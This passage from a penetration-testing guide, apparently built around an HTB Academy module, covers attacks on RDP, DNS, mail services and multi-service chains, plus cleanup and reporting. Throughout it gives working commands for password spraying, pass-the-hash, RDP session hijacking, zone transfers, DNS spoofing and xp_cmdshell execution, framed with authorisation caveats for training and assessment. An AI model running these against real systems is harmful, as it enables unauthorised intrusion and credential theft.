users.txt -c 'ApprovedCandidate!' 723 hydra -L users.txt -p 'ApprovedCandidate!' -t 2 -W 2 "$IP" rdp 724 ``` 725 726 Hydra's RDP module can be unreliable under NLA and server throttling. Validate one known-good or deliberately invalid connection with a real client before treating automated failures as authoritative. 727 728 ### Connect with FreeRDP 729 730 ```bash 731 xfreerdp /v:"$IP" /u:"$U" /d:"$DOMAIN" /p:"$P" /cert:tofu 732 733 # Map a local staging directory as a remote drive named assessment 734 xfreerdp /v:"$IP" /u:"$U" /d:"$DOMAIN" /p:"$P" \ 735 /drive:assessment,"$PWD/staging" /cert:tofu 736 ``` 737 738 Drive, clipboard, printer, audio, and device redirection can move data in both directions. Enable only what the engagement needs. Treat the mapped drive as a transfer channel in the evidence log. 739 740 ### Restricted Admin Mode and pass-the-hash 741 742 Restricted Admin Mode prevents the client from sending reusable credentials to the RDP host and allows FreeRDP to authenticate with an NT hash when the target permits the mode. 743 744 ```batch 745 :: Enabling this remotely changes the target and requires prior admin rights 746 reg add HKLM\System\CurrentControlSet\Control\Lsa ^ 747 /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f 748 ``` 749 750 ```bash 751 xfreerdp /v:"$IP" /u:Administrator /pth:'<NT_HASH>' /cert:tofu 752 ``` 753 754 Check the registry value before changing it and restore that exact state after the test. A successful SMB pass-the-hash does not guarantee RDP logon rights or Restricted Admin support. 755 756 ### Session inventory and hijacking 757 758 An administrator can list sessions, but `tscon` session reassignment without the user's password requires SYSTEM on affected older Windows versions. Modern releases have mitigations and behavior varies by version. 759 760 ```batch 761 query user 762 query session 763 764 :: Historical technique: service runs as LocalSystem and connects to session 2 765 sc.exe create SessionProof binPath= "cmd.exe /c tscon 2 /dest:console" 766 sc.exe start SessionProof 767 sc.exe delete SessionProof 768 ``` 769 770 This disrupts a user's desktop and creates a service. Use it only when the engagement specifically permits session access and the user-impact risk is accepted. Prefer a session listing as proof of exposure. 771 772 ### BlueKeep, CVE-2019-0708 773 774 BlueKeep is a pre-authentication use-after-free in older Remote Desktop Services implementations. Exploitation can crash the host. Confirm the Windows version and patch state first, use a non-exploit scanner when possible, and schedule any exploit attempt with the same controls as a reboot-risk test. 775 776 ## 10 · DNS reconnaissance and trust abuse `fas:Terminal` 777 778 DNS reveals the namespace that other service attacks depend on. UDP handles most queries; TCP is used for large responses and zone transfers. Start with record collection and nameserver discovery before brute-force enumeration. 779 780 ### Query the namespace 781 782 ```bash 783 dig A "$TARGET" @"$IP" 784 dig AAAA "$TARGET" @"$IP" 785 dig NS "$DOMAIN" @"$IP" 786 dig MX "$DOMAIN" @"$IP" 787 dig TXT "$DOMAIN" @"$IP" 788 dig SOA "$DOMAIN" @"$IP" 789 dig -x "$IP" @"$IP" 790 791 host -a "$DOMAIN" "$IP" 792 ``` 793 794 The SOA record names the primary server and zone administrator mailbox. NS and MX records produce hosts for follow-up service scans. TXT records may expose mail policy, verification tokens, or internal naming conventions. 795 796 ### Zone transfer 797 798 ```bash 799 dig AXFR "$DOMAIN" @"$IP" 800 801 # Try every authoritative nameserver, because policy can differ 802 for ns in $(dig +short NS "$DOMAIN"); do 803 dig AXFR "$DOMAIN" @"$ns" 804 done 805 ``` 806 807 A successful AXFR can disclose the zone's hostnames and records. It is a confidentiality issue, not code execution. Save the full transfer and feed new names back into DNS resolution and port discovery. 808 809 ### Subdomain enumeration 810 811 ```bash 812 subfinder -d "$DOMAIN" -silent -o subdomains-passive.txt 813 fierce --domain "$DOMAIN" --dns-servers "$IP" 814 815 while read -r name; do 816 host "$name.$DOMAIN" "$IP" 817 done < approved-subdomain-list.txt 818 ``` 819 820 Passive discovery touches third-party sources and may reveal out-of-scope assets. Resolve and test only names within the authorised boundary. 821 822 ### Dangling records and subdomain takeover 823 824 ```bash 825 dig CNAME "support.$DOMAIN" +short 826 host "support.$DOMAIN" 827 ``` 828 829 A dangling CNAME points to a provider resource that no longer exists. Provider error text is an indicator, not final proof that the name is claimable. Confirm the provider-specific conditions and get approval before registering any resource. Taking control of a production subdomain is a state-changing action with brand and cookie-scope impact. 830 831 ### Local DNS spoofing 832 833 Ettercap or Bettercap can answer DNS requests during an authorised layer-2 man-in-the-middle test. The path requires local network position, ARP spoofing or equivalent traffic control, and a victim that trusts the supplied response. 834 835 ```text 836 # /etc/ettercap/etter.dns example 837 portal.example.test A 10.10.14.2 838 *.example.test A 10.10.14.2 839 ``` 840 841 Document the traffic-positioning prerequisite. A writable local hosts file or control of a resolver is a different finding from spoofing broadcast-domain traffic. 842 843 ## 11 · SMTP, POP3, and IMAP `fas:Terminal` 844 845 SMTP sends or relays mail. POP3 downloads a mailbox with a small command set. IMAP keeps mail on the server and supports folder and message search. The services often share an identity provider, so a username or password confirmed by one should be checked against the others within the approved attempt budget. 846 847 ### Identify the mail platform 848 849 ```bash 850 dig +short MX "$DOMAIN" 851 host -t MX "$DOMAIN" 852 853 sudo nmap -Pn -n -sV -sC \ 854 -p25,110,143,465,587,993,995 \ 855 --script smtp-commands,smtp-enum-users,smtp-open-relay,pop3-capabilities,imap-capabilities \ 856 -oA "$EVIDENCE/mail" "$IP" 857 ``` 858 859 MX hosts under `mail.protection.outlook.com` indicate Microsoft 365. Google Workspace commonly points to Google's MX hosts. Cloud identity testing has provider-specific throttling, federation, MFA, and legal constraints. Do not send generic high-rate Hydra traffic at a cloud provider. 860 861 ### Manual SMTP capability and user checks 862 863 ```bash 864 openssl s_client -starttls smtp -connect "$IP:25" -crlf -quiet 865 ``` 866 867 ```text 868 EHLO assessor.example 869 VRFY candidate 870 EXPN staff 871 MAIL FROM:<probe@assessor.example> 872 RCPT TO:<candidate@example.test> 873 RSET 874 QUIT 875 ``` 876 877 Interpret response codes in context: 878 879 | Response | Typical meaning | Caveat | 880 |---:|---|---| 881 | `220` | service ready | banner may disclose product/hostname | 882 | `250` | requested action accepted | acceptance can be deferred; it does not always prove mailbox delivery | 883 | `252` | user cannot be verified, but mail may be accepted | often prevents clean VRFY enumeration | 884 | `550` | mailbox/action rejected | policy and anti-enumeration controls can mask validity | 885 886 Test valid-looking and definitely invalid controls. Username enumeration exists only when responses differ reliably enough to classify candidates. 887 888 ```bash 889 smtp-user-enum -M VRFY -U users.txt -t "$IP" 890 smtp-user-enum -M RCPT -U users.txt -D "$DOMAIN" -t "$IP" 891 smtp-user-enum -M EXPN -U aliases.txt -t "$IP" 892 ``` 893 894 ### POP3 and IMAP by hand 895 896 ```bash 897 openssl s_client -connect "$IP:995" -crlf -quiet 898 ``` 899 900 ```text 901 USER candidate 902 PASS <secret> 903 STAT 904 LIST 905 RETR 1 906 QUIT 907 ``` 908 909 ```bash 910 openssl s_client -connect "$IP:993" -crlf -quiet 911 ``` 912 913 ```text 914 a1 CAPABILITY 915 a2 LOGIN candidate <secret> 916 a3 LIST "" "*" 917 a4 SELECT INBOX 918 a5 SEARCH TEXT "password" 919 a6 FETCH 1 BODY.PEEK[] 920 a7 LOGOUT 921 ``` 922 923 Use `BODY.PEEK[]` during IMAP review so the server does not set the Seen flag merely because the assessor fetched the message. Mailbox access exposes personal and regulated data; search narrowly and retain only what supports the finding. 924 925 ### Self-hosted credential tests 926 927 ```bash 928 hydra -L users.txt -p 'ApprovedCandidate!' -f "$IP" pop3 929 hydra -L users.txt -p 'ApprovedCandidate!' -f "$IP" imap 930 hydra -L users.txt -p 'ApprovedCandidate!' -f "$IP" smtp 931 ``` 932 933 Use the TLS-specific module or service syntax when the endpoint requires implicit TLS. Confirm the authentication mechanism from capabilities before interpreting failures. 934 935 ### Microsoft 365 workflow 936 937 The source module uses o365spray because provider-side responses, federation, and throttling need cloud-aware handling. 938 939 ```bash 940 python3 o365spray.py --validate --domain "$DOMAIN" 941 python3 o365spray.py --enum -U users.txt --domain "$DOMAIN" 942 python3 o365spray.py --spray -U confirmed-users.txt \ 943 -p 'ApprovedCandidate!' --count 1 --lockout 1 --domain "$DOMAIN" 944 ``` 945 946 Cloud spraying can trigger tenant alerts and account controls. The engagement must explicitly name the tenant, test accounts or user population, attempt count, delay, and stop conditions. MFA does not make password validation harmless; a correct first factor remains sensitive evidence. 947 948 ### Open relay validation 949 950 ```bash 951 sudo nmap -Pn -n -p25 --script smtp-open-relay "$IP" 952 953 swaks --server "$IP" \ 954 --from probe@external.example \ 955 --to controlled-recipient@external.example \ 956 --header 'Subject: authorised relay proof' \ 957 --body 'Controlled relay validation. Do not forward.' 958 ``` 959 960 Use sender and recipient accounts controlled by the assessment team. A `250` response during the transaction does not prove final external delivery. Retain the received message headers as evidence and avoid testing impersonation of a real employee. 961 962 ### OpenSMTPD command injection, CVE-2020-7247 963 964 Affected OpenSMTPD versions mishandled shell metacharacters in an attacker-controlled sender field. The daemon's local delivery path could execute a short command with elevated rights. Confirm the exact product and version before using a public proof of concept. The published technique is length constrained and is suitable only for a disposable lab or a separately approved exploit window. 965 966 ## 12 · Combine services without losing state `fas:Route` 967 968 The fastest path through a multi-service host is a state machine. Each new identity or secret returns to the authentication stage for every compatible service. 969 970 <figure class="flow plate corners"> 971 <figcaption class="flow__cap"><span class="flow__kind">Multi-service state machine</span><span class="flow__dir">TD</span></figcaption> 972 <div class="flow__body"> 973 <svg class="flow-svg" viewBox="0 0 460 1100" role="img" aria-label="Full scan, unauthenticated checks, collect files, update credential matrix, validate services, enumerate permissions, then a decision: if a new host account secret or trust is found loop back to the credential matrix, otherwise proceed to version-gated exploit review then minimal proof, cleanup and report"> 974 <path class="fedge" d="M200,88 L200,156" marker-end="url(#flow-arrow)" /> 975 <path class="fedge" d="M200,206 L200,274" marker-end="url(#flow-arrow)" /> 976 <path class="fedge" d="M200,324 L200,392" marker-end="url(#flow-arrow)" /> 977 <path class="fedge" d="M200,442 L200,510" marker-end="url(#flow-arrow)" /> 978 <path class="fedge" d="M200,560 L200,628" marker-end="url(#flow-arrow)" /> 979 <path class="fedge" d="M200,678 L200,746" marker-end="url(#flow-arrow)" /> 980 <path class="fedge" d="M200,832 L200,900" marker-end="url(#flow-arrow)" /> 981 <path class="fedge" d="M200,950 L200,1018" marker-end="url(#flow-arrow)" /> 982 <path class="fedge is-back" d="M380,790 L410,790 L410,418 L372,418" marker-end="url(#flow-arrow)" /> 983 <g class="fnode is-entry"><rect class="fnode__box" x="30" y="40" width="340" height="48" /><text class="fnode__label" x="200" y="68" text-anchor="middle">Full TCP plus targeted UDP scan</text></g> 984 <g class="fnode"><rect class="fnode__box" x="30" y="158" width="340" height="48" /><text class="fnode__label" x="200" y="178" text-anchor="middle">Unauthenticated checks<tspan class="sub" x="200" dy="15">anonymous, null, records, capabilities</tspan></text></g> 985 <g class="fnode"><rect class="fnode__box" x="30" y="276" width="340" height="48" /><text class="fnode__label" x="200" y="304" text-anchor="middle">Collect names and scoped files</text></g> 986 <g class="fnode"><rect class="fnode__box" x="30" y="394" width="340" height="48" /><text class="fnode__label" x="200" y="422" text-anchor="middle">Update identity and credential matrix</text></g> 987 <g class="fnode"><rect class="fnode__box" x="30" y="512" width="340" height="48" /><text class="fnode__label" x="200" y="540" text-anchor="middle">Validate against every compatible service</text></g> 988 <g class="fnode"><rect class="fnode__box" x="30" y="630" width="340" height="48" /><text class="fnode__label" x="200" y="658" text-anchor="middle">Enumerate effective permissions</text></g> 989 <g class="fnode is-decision"><polygon class="fdecision__poly" points="200,748 380,790 200,832 20,790" /><text class="fdecision__label" x="200" y="794" text-anchor="middle">New host, account, secret, or trust?</text></g> 990 <g class="fnode"><rect class="fnode__box" x="30" y="902" width="340" height="48" /><text class="fnode__label" x="200" y="930" text-anchor="middle">Version-gated exploit review</text></g> 991 <g class="fnode"><rect class="fnode__box" x="30" y="1020" width="340" height="48" /><text class="fnode__label" x="200" y="1048" text-anchor="middle">Minimal proof, cleanup, report</text></g> 992 <g class="felabel"><rect class="felabel__box" x="394" y="596" width="32" height="16" /><text class="felabel__text" x="410" y="607" text-anchor="middle">yes</text></g> 993 <g class="felabel"><rect class="felabel__box" x="187" y="858" width="26" height="16" /><text class="felabel__text" x="200" y="869" text-anchor="middle">no</text></g> 994 </svg> 995 </div> 996 </figure> 997 998 ### Chain A: file service to mail to database 999 1000 1. FTP allows anonymous listing. 1001 2. A filename or document author supplies a candidate username. 1002 3. SMTP or POP3 responses confirm the account. 1003 4. A controlled spray confirms a reused password. 1004 5. A mailbox search returns a database connection string. 1005 6. MSSQL permissions reveal `IMPERSONATE` or direct `sysadmin` access. 1006 7. `xp_cmdshell 'whoami'` proves the OS security context. 1007 1008 ### Chain B: SMB to administrative execution 1009 1010 1. SMB null access exposes a share and password-policy clues through RPC. 1011 2. Share content supplies a local administrator credential or NT hash. 1012 3. NetExec distinguishes local from domain authentication and confirms admin rights. 1013 4. An Impacket execution method runs a short identity command. 1014 5. A local SAM dump is performed only if credential compromise is in scope. 1015 6. Reuse testing is restricted to approved hosts and recorded per target. 1016 1017 ### Chain C: DNS to forgotten management hosts 1018 1019 1. NS and AXFR checks expose internal or legacy hostnames. 1020 2. New names are resolved and scanned within scope. 1021 3. An old FTP, mail, or database instance exposes a weaker authentication path. 1022 4. The resulting account is tested on the primary services. 1023 1024 ### Three-tier practice plan 1025 1026 | Scenario shape | First priority | Expected connection | 1027 |---|---|---| 1028 | Mail, customer data, and files | SMTP/POP3/IMAP plus FTP/SMB anonymous checks | mailbox or file loot supplies the next credential | 1029 | Rarely used backup/test host | full `-p-` scan and default/test credentials | neglected configuration exposes data or a reused secret | 1030 | File server plus unknown database | share inventory followed by SQL fingerprinting | configuration or document content supplies database access | 1031 1032 Do not import flags or dynamic lab credentials into the cheatsheet. The learning objective is the chain and its evidence, not a static answer from one spawned target. 1033 1034 ## 13 · Failure analysis 1035 1036 | Symptom | Likely cause | Check | 1037 |---|---|---| 1038 | SMB login works in one tool and fails in another | realm mismatch or guest fallback | specify domain/local realm; inspect effective username | 1039 | `Pwn3d!` absent after valid SMB auth | account is not admin on that host | enumerate share/RPC rights instead of forcing RCE | 1040 | Relay listener receives auth but target action fails | signing, EPA/channel binding, protocol mismatch, or weak target rights | inspect target prerequisites and ntlmrelayx logs | 1041 | MSSQL login fails with a known domain credential | wrong auth mode, hostname, TLS, or SPN | use `-windows-auth`; resolve FQDN; test Kerberos separately | 1042 | `xp_cmdshell` returns access denied | SQL service account lacks OS rights or proxy context differs | query service identity and use a harmless local command | 1043 | MySQL `LOAD_FILE()` returns `NULL` | missing `FILE`, blocked path, unreadable file, or `secure_file_priv` | check grants, policy value, and filesystem assumptions | 1044 | RDP spray tool reports all failures | NLA, throttling, TLS/client incompatibility, or lockout | test one manual connection and inspect NLA/encryption | 1045 | SMTP gives the same reply for every user | anti-enumeration policy | compare valid and invalid controls; do not claim enumeration | 1046 | AXFR fails against one server | transfer policy differs per NS | test each authoritative nameserver | 1047 | FTP transfer corrupts an archive | ASCII transfer mode | repeat in `binary` mode and compare hashes | 1048 1049 ## 14 · Proof, cleanup, and reporting 1050 1051 ### Minimal proof ladder 1052 1053 Move down this list only as far as the finding requires: 1054 1055 1. Capture banner, protocol identity, and relevant configuration response. 1056 2. List an exposed object without downloading its content. 1057 3. Read a low-sensitivity test object or one narrowly selected file. 1058 4. Create and delete a harmless marker in an approved path. 1059 5. Execute `whoami` and `hostname` in an approved window. 1060 6. Extract credential material or open a user session only when the rules of engagement require that proof. 1061 1062 ### Change log 1063 1064 | Time | Host | Service | Change | Original state | Cleanup | Evidence | 1065 |---|---|---|---|---|---|---| 1066 | UTC timestamp | target | MSSQL | enabled `xp_cmdshell` | disabled | restored to disabled | transcript path | 1067 1068 Track uploaded files, services, tasks, registry values, database settings, mapped drives, relay listeners, and cloud test messages. Cleanup should be testable. Confirm a marker is gone, a setting matches its original value, and a temporary service no longer exists. 1069 1070 ### Finding structure 1071 1072 Write each finding around the complete path: 1073 1074 - **Exposure:** the reachable service, product/version, and unauthenticated information. 1075 - **Prerequisites:** network position, authentication state, role, signing, NLA, or provider condition. 1076 - **Action:** the exact safe test performed. 1077 - **Result:** data read, write permission, effective account, relayed action, or remote host reached. 1078 - **Impact:** the data, system, or trust boundary affected. Avoid inflating a local host result into domain compromise. 1079 - **Remediation:** disable unused protocols, remove anonymous access, enforce least privilege, patch the exact vulnerable product, require SMB signing where compatible, tighten relay protections, and monitor credential reuse. 1080 - **Retest:** repeat the original proof and confirm it now fails for the intended reason. 1081 1082 ## 15 · Compact command index `fas:ClipboardList` 1083 1084 | Goal | Command | 1085 |---|---| 1086 | Full TCP sweep | `sudo nmap -Pn -n -p- --open -sV -oA evidence/all $IP` | 1087 | Anonymous FTP | `ftp $IP` then `anonymous` | 1088 | SMB shares, null | `smbclient -N -L //$IP` | 1089 | SMB permissions | `smbmap -H $IP` | 1090 | SMB/RPC sweep | `enum4linux-ng -A -C $IP` | 1091 | SMB signing | `nmap -p445 --script smb2-security-mode $IP` | 1092 | Domain password spray | `nxc smb targets.txt -d $DOMAIN -u users.txt -p 'Candidate!'` | 1093 | MSSQL login | `impacket-mssqlclient "$DOMAIN/$U@$TARGET" -windows-auth` | 1094 | MySQL login | `mysql -h $IP -u $U -p` | 1095 | MSSQL OS context | `EXEC master..xp_cmdshell 'whoami';` | 1096 | MSSQL links | `EXEC master.dbo.sp_linkedservers;` | 1097 | RDP identity | `nmap -p3389 --script rdp-ntlm-info $IP` | 1098 | RDP client | `xfreerdp /v:$IP /u:$U /d:$DOMAIN /p:$P /cert:tofu` | 1099 | Zone transfer | `dig AXFR $DOMAIN @$IP` | 1100 | Mail ports | `nmap -sV -sC -p25,110,143,465,587,993,995 $IP` | 1101 | SMTP users | `smtp-user-enum -M RCPT -U users.txt -D $DOMAIN -t $IP` | 1102 | Open relay | `nmap -p25 --script smtp-open-relay $IP` | 1103 | NetNTLMv2 crack | `hashcat -m 5600 capture.txt wordlist.txt` | 1104 1105 ## 16 · CVE and condition index 1106 1107 | Issue | Service | Required condition | Safe validation stance | 1108 |---|---|---|---| 1109 | CVE-2022-22836 | CoreFTP HTTP upload | affected build plus authenticated PUT access | removable text-file write | 1110 | CVE-2020-0796, SMBGhost | SMBv3.1.1 | affected Windows build and missing patch | scanner and patch evidence first; crash risk | 1111 | CVE-2012-2122 | old MySQL/MariaDB builds | affected compiler/build and unpatched version | version-gated lab testing | 1112 | CVE-2019-0708, BlueKeep | RDP | vulnerable legacy Windows/RDS and missing patch | non-exploit check first; crash risk | 1113 | CVE-2020-7247 | OpenSMTPD | affected version and delivery path | exact fingerprint; lab or approved exploit window | 1114 | CVE-2021-44228, Log4Shell | Java logging path | vulnerable Log4j reachable through attacker input | controlled callback and application-context evidence | 1115 1116 ## 17 · References `fas:BookOpen` 1117 1118 1. [HTB Academy, Attacking Common Services](https://academy.hackthebox.com/module/details/116) 1119 2. [Microsoft Open Specifications, MS-SMB2](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/) 1120 3. [Microsoft, xp_cmdshell](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql) 1121 4. [Microsoft, linked servers](https://learn.microsoft.com/en-us/sql/relational-databases/linked-servers/linked-servers-database-engine) 1122 5. [Impacket](https://github.com/fortra/impacket) 1123 6. [NetExec](https://github.com/Pennyw0rth/NetExec) 1124 7. [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) 1125 8. [Responder](https://github.com/lgandx/Responder) 1126 9. [FreeRDP](https://github.com/FreeRDP/FreeRDP) 1127 10. [Nmap NSE documentation](https://nmap.org/nsedoc/) 1128 11. [NVD, CVE-2022-22836](https://nvd.nist.gov/vuln/detail/CVE-2022-22836) 1129 12. [NVD, CVE-2020-0796](https://nvd.nist.gov/vuln/detail/CVE-2020-0796) 1130 13. [NVD, CVE-2012-2122](https://nvd.nist.gov/vuln/detail/CVE-2012-2122) 1131 14. [NVD, CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708) 1132 15. [NVD, CVE-2020-7247](https://nvd.nist.gov/vuln/detail/CVE-2020-7247) 1133 16. [NVD, CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) 1134 1135 [Condensed service card](/sheets/pentest-workflow/attacking-common-services-guide) · [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Next long-form guide: common applications](/sheets/pentest-workflow/attacking-common-applications-guide)